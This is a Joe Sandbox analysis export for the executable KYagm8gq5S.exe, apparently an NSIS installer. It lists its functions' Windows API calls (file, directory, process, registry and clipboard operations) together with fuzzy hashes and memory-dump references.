Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
Instruction ID: cd791cecd07b1aef7d4b508d0a52a2ac0ec5e235a68ccce80931b69816989e44
Opcode Fuzzy Hash: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
Instruction Fuzzy Hash: 6301F4326242109BE7195B389D05B6B36A8F791314F10863FF955F62F1DA78CC42DB4D

Function 00405AA8 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(007AB800,?), ref: 00405AEA
GetLastError.KERNEL32 ref: 00405AF8

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction ID: 13352011552d0ddc4b0c1568d720dcd5f2ba617a9a750a7f60e40e4c0ab4bb23
Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction Fuzzy Hash: 52F0F4B0D0060EDADB00CFA4C6487EFBBB4AB04309F10812AD941B6281D7B882488FA9

Function 00405B37 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,007AB800,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,007AB800,?), ref: 00405B60
CloseHandle.KERNEL32(?,?,?,007AB800,?), ref: 00405B6D

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
Instruction ID: e42c3092a0fd4a031c4fd4b3b8927d6f3122727aa63034fdce6a98e2e8d9435a
Opcode Fuzzy Hash: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
Instruction Fuzzy Hash: ECE09AB4900249BFEB109F64AD05E7B776CE745644F008525BD10F6151D775A8148A79

Function 00406948 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C,?,?,?,?,?,?,?,?), ref: 0040695A
GetProcAddress.KERNEL32(00000000,?), ref: 00406975

Part of subcall function 004068D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
Part of subcall function 004068D8: wsprintfW.USER32 ref: 0040692A
Part of subcall function 004068D8: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040693E

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction ID: 551f93d59f6a57a7cc32b559d7ebc8a6d8da67cd5dc02587d5b4d2bd1ffdf244
Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction Fuzzy Hash: 95E08673504310AAD2105A705E04C2B73B89F85740302443EF942F2140D734DC32E769

Function 00406044 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\KYagm8gq5S.exe,80000000,00000003), ref: 00406048
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Function 0040601F Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C24,?,?,00000000,00405DFA,?,?,?,?), ref: 00406024
SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406038

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: d82061c04a2b8cfefef23152450b12cfa0b89b98e7d36fec1851b0ef0e6873e8
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: 96D0C972505220AFC6103728EE0889BBB55DB542B1B028B36F8A9A22B0CB304C668694

Function 00403B4C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403A7F,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B57

Strings

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\, xrefs: 00403B6B

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\
API String ID: 2962429428-652483267
Opcode ID: 75b6059274c34f4acd1c30ca659bcafdfbceb07ace89e443466d463c647567ff
Instruction ID: a1f1ac0e1dc9f784418d88d53cf8a45e589aa6af5dd6b663cfe1e6d9b7eec15f
Opcode Fuzzy Hash: 75b6059274c34f4acd1c30ca659bcafdfbceb07ace89e443466d463c647567ff
Instruction Fuzzy Hash: CBC0123090470996E5207F7D9D8FE453A24574033DB948325B1B9B00F3C73C5659555D

Function 00405B02 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B16

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: 7bb2d1eb449126eed485e4eb4fbdbafbf981390ed288ef949080c13de55397a1
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 7CC08C30314902DADA802B209F0870B3A60AB80340F154439A582E00E4CA30A445C92D

Function 004063EF Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406418

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction ID: 1ec48b264e911f442ad562827ea2aeba8bdc9c692846981259ff7ce92a87d17c
Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction Fuzzy Hash: 60E0BF72110109BFEF095F90DD0AD7B761DE704210B01452EF906D4051E6B5A9305674

Function 004060C7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E4,00000000,00000000,0040332B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DB

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: 1a6ac9c2f17c3bf7024e7b579d6ce6ab3b84958f313ea5b4b1ce89539a84cc3a
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 55E0EC3225026AABDF10DE55DC00EEB7BACEB053A0F018437F956E7150DA31E93197A8

Function 004060F6 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349A,00000000,00793700,000000FF,00793700,000000FF,000000FF,00000004,00000000), ref: 0040610A

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 280cd4c212b49affc14266408846aa3a30e7e9a640caac8a44b81d30c287abca
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: E1E08C3221025AABCF109E908C01EEB7B6CEB043A0F014433FD16EB051D230E8319BA8

Function 00406314 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(?,?,00000005,00405E12,?,00000000,000000F1,?,?,?,?,?), ref: 0040631E

Part of subcall function 0040619A: CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406335,?,?), ref: 004061D5
Part of subcall function 0040619A: GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061DE
Part of subcall function 0040619A: GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061FB
Part of subcall function 0040619A: wsprintfA.USER32 ref: 00406219
Part of subcall function 0040619A: GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?,?,?,?,?), ref: 00406254
Part of subcall function 0040619A: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406263
Part of subcall function 0040619A: lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629B
Part of subcall function 0040619A: SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F1

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: File$NamePathShort$AllocCloseGlobalHandleMovePointerSizelstrcpywsprintf
String ID:
API String ID: 1930046112-0
Opcode ID: 1e4010844bb8ba65faee9067da085bc24f8460d998ee42ad1bb04f80e0c5d623
Instruction ID: 61133f9cef57a20764965838461fa3ce05e158346d16c5387ed6595a8127f79a
Opcode Fuzzy Hash: 1e4010844bb8ba65faee9067da085bc24f8460d998ee42ad1bb04f80e0c5d623
Instruction Fuzzy Hash: 38D09E32148601AEDA411B50DD05A5B7BA1BF94355F11C42EF585540B1DB358461DF09

Function 004034E7 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034F5

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 00401FC9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004055D9: lstrlenW.KERNEL32(007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
Part of subcall function 004055D9: lstrcatW.KERNEL32(007A0728,0040341A,0040341A,007A0728,00000000,00798B00,74DF23A0), ref: 00405634
Part of subcall function 004055D9: SetWindowTextW.USER32(007A0728,007A0728), ref: 00405646
Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694

Part of subcall function 00405B37: CreateProcessW.KERNELBASE(00000000,007AB800,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,007AB800,?), ref: 00405B60
Part of subcall function 00405B37: CloseHandle.KERNEL32(?,?,?,007AB800,?), ref: 00405B6D

CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00402010

Part of subcall function 004069F3: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401FC4,?,?,?,?,?,?), ref: 00406A04
Part of subcall function 004069F3: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A26

Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 73d48fa51c11560306f2ecb512b72b21235bf248d8e77f8fe192972158bbb83d
Instruction ID: 31278e7032d6d459f1869afa1fc16bf8b986fef5f9539014001fbe5517bff4f7
Opcode Fuzzy Hash: 73d48fa51c11560306f2ecb512b72b21235bf248d8e77f8fe192972158bbb83d
Instruction Fuzzy Hash: 83F09672905511DBDB20BBA59A8999E7664DF0031CF21413FF202B25D5CABC4E41EA6E

Non-executed Functions

Function 00405718 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405776
GetDlgItem.USER32(?,000003EE), ref: 00405785
GetClientRect.USER32(?,?), ref: 004057C2
GetSystemMetrics.USER32(00000002), ref: 004057C9
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057EA
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FB
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040580E
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581C
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040582F
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405851
ShowWindow.USER32(?,00000008), ref: 00405865
GetDlgItem.USER32(?,000003EC), ref: 00405886
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405896
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058AF
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BB
GetDlgItem.USER32(?,000003F8), ref: 00405794

Part of subcall function 00404508: SendMessageW.USER32(00000028,?,00000001,00404333), ref: 00404516

GetDlgItem.USER32(?,000003EC), ref: 004058D8
CreateThread.KERNEL32(00000000,00000000,Function_000056AC,00000000), ref: 004058E6
CloseHandle.KERNEL32(00000000), ref: 004058ED
ShowWindow.USER32(00000000), ref: 00405911
ShowWindow.USER32(?,00000008), ref: 00405916
ShowWindow.USER32(00000008), ref: 00405960
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405994
CreatePopupMenu.USER32 ref: 004059A5
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059B9
GetWindowRect.USER32(?,?), ref: 004059D9
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F2
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2A
OpenClipboard.USER32(00000000), ref: 00405A3A
EmptyClipboard.USER32 ref: 00405A40
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4C
GlobalLock.KERNEL32(00000000), ref: 00405A56
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6A
GlobalUnlock.KERNEL32(00000000), ref: 00405A8A
SetClipboardData.USER32(0000000D,00000000), ref: 00405A95
